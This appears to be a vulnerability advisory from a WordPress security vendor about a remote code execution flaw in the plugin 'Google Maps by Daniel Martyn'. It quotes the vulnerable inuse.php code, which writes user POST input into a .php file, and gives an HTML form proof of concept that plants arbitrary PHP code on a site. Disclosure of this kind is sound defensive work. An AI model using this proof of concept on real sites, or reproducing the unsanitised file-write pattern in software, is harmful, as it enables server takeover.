One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/google-maps-by-daniel-martyn/js/gmbdm.js, from the plugin Google Maps by Daniel Martyn. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.
In looking over the plugin for what hacker might be interested in it we quickly found a remote code execution vulnerability in it. The file /inuse.php contains the following code:
$inuse = $_POST['checkinuse']; $infile = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/google-maps-by-daniel-martyn/version.php', 'w'); $inuse = str_replace('\\', '', $inuse); $inuse = htmlentities($inuse); fwrite($infile, html_entity_decode($inuse)); fclose($infile); echo $inuse;
That code will take the value of the POST input “checkinuse” and save it to a file named version.php in the plugin’s directory. Through that, malicious code can be loaded in to a file with a .php extension, which would allow the code to execute.
Proof of Concept
The following proof of concept will place the specified PHP code in to the file version.php in the directory /wp-content/plugins/google-maps-by-daniel-martyn/.
Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.
<html> <body> <form action="http://[path to WordPress]/wp-content/plugins/google-maps-by-daniel-martyn/inuse.php" method="POST"> <input type="hidden" name="checkinuse" value="[PHP code]" /> <input type="submit" value="Submit" /> </form> </body> </html>